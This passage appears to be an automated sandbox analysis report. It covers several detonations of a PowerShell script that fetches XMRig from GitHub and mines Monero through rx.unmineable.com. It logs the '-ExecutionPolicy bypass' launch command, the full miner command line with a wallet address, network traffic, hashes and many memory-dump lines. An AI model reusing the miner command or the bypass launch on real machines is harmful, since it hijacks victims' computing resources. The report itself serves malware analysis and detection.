US 8.8.8.8:53 114.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp

Files

memory/3424-0-0x00007FFC67253000-0x00007FFC67255000-memory.dmp

memory/3424-10-0x00000204C5FA0000-0x00000204C5FC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_samsfzpn.s2k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3424-11-0x00007FFC67250000-0x00007FFC67D11000-memory.dmp

memory/3424-12-0x00007FFC67250000-0x00007FFC67D11000-memory.dmp

memory/3424-13-0x00007FFC67253000-0x00007FFC67255000-memory.dmp

memory/3424-14-0x00007FFC67250000-0x00007FFC67D11000-memory.dmp

memory/3424-16-0x00007FFC67250000-0x00007FFC67D11000-memory.dmp

memory/3424-17-0x00000204C6150000-0x00000204C6162000-memory.dmp

memory/3424-18-0x00000204C5F80000-0x00000204C5F8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5036-49-0x0000025315080000-0x00000253150A0000-memory.dmp

memory/5036-50-0x0000025316890000-0x00000253168B0000-memory.dmp

memory/5036-51-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-52-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-53-0x00000253168B0000-0x00000253168D0000-memory.dmp

memory/5036-54-0x00000253168D0000-0x00000253168F0000-memory.dmp

memory/3424-56-0x00007FFC67250000-0x00007FFC67D11000-memory.dmp

memory/5036-55-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-57-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-59-0x00000253168D0000-0x00000253168F0000-memory.dmp

memory/5036-58-0x00000253168B0000-0x00000253168D0000-memory.dmp

memory/5036-60-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-61-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-62-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-63-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-64-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-65-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-66-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-67-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-68-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-69-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-70-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-71-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-72-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-73-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-74-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-75-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-76-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-77-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-78-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-79-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-80-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-81-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-82-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-83-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-84-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-85-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-86-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-87-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-88-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-89-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-90-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-91-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-92-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-93-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-94-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-95-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-96-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-97-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-98-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-99-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-100-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-101-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-102-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-103-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-104-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-105-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-106-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-107-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-108-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-109-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-110-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-111-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-112-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-113-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-114-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-115-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-116-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-117-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

memory/5036-118-0x00007FF7BF4E0000-0x00007FF7C0113000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win11-20240426-en

Max time kernel

1788s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp

Files

memory/2696-0-0x00007FF815A93000-0x00007FF815A95000-memory.dmp

memory/2696-9-0x00007FF815A90000-0x00007FF816552000-memory.dmp

memory/2696-10-0x0000012B59B50000-0x0000012B59B72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1wzc4qm.1hv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2696-11-0x00007FF815A90000-0x00007FF816552000-memory.dmp

memory/2696-12-0x00007FF815A90000-0x00007FF816552000-memory.dmp

memory/2696-13-0x00007FF815A90000-0x00007FF816552000-memory.dmp

memory/2696-14-0x00007FF815A90000-0x00007FF816552000-memory.dmp

memory/2696-15-0x00007FF815A90000-0x00007FF816552000-memory.dmp

memory/2696-17-0x0000012B59D50000-0x0000012B59D62000-memory.dmp

memory/2696-18-0x0000012B59BE0000-0x0000012B59BEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4436-49-0x0000020848650000-0x0000020848670000-memory.dmp

memory/4436-50-0x00000208488B0000-0x00000208488D0000-memory.dmp

memory/4436-51-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-52-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-53-0x00000208488D0000-0x00000208488F0000-memory.dmp

memory/4436-54-0x00000208488F0000-0x0000020848910000-memory.dmp

memory/4436-55-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-56-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-58-0x00000208488F0000-0x0000020848910000-memory.dmp

memory/4436-57-0x00000208488D0000-0x00000208488F0000-memory.dmp

memory/4436-59-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-60-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-61-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-62-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-63-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-64-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-65-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-66-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-67-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-68-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-69-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-70-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-71-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-72-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-73-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-74-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-75-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-76-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-77-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-78-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-79-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-80-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-81-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-82-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-83-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-84-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-85-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-86-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-87-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-88-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-89-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-90-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-91-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-92-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-93-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-94-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-95-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-96-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-97-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-98-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-99-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-100-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-101-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-102-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-103-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-104-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-105-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-106-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-107-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-108-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-109-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-110-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-111-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-112-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-113-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-114-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-115-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-116-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

memory/4436-117-0x00007FF790FC0000-0x00007FF791BF3000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:45

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/4404-2-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp

memory/4404-5-0x00000154AA5C0000-0x00000154AA5E2000-memory.dmp

memory/4404-8-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-9-0x00000154AA880000-0x00000154AA8F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3g4hpsnm.te2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4404-10-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-25-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-61-0x00000154AA850000-0x00000154AA85A000-memory.dmp

memory/4404-48-0x00000154AA860000-0x00000154AA872000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1880-90-0x0000025930420000-0x0000025930440000-memory.dmp

memory/1880-91-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/4404-92-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp

memory/4404-93-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/1880-94-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-95-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-96-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-97-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-98-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-99-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-100-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-101-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-102-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-103-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-104-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-105-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-106-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-107-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-108-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-109-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-110-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-111-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-112-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-113-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-114-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-115-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-116-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-117-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-118-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-119-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-120-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-121-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-122-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-123-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-124-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-125-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-126-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-127-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-128-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-129-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-130-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-131-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-132-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-133-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-134-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-135-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-136-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-137-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-138-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-139-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-140-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-141-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-142-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-143-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-144-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

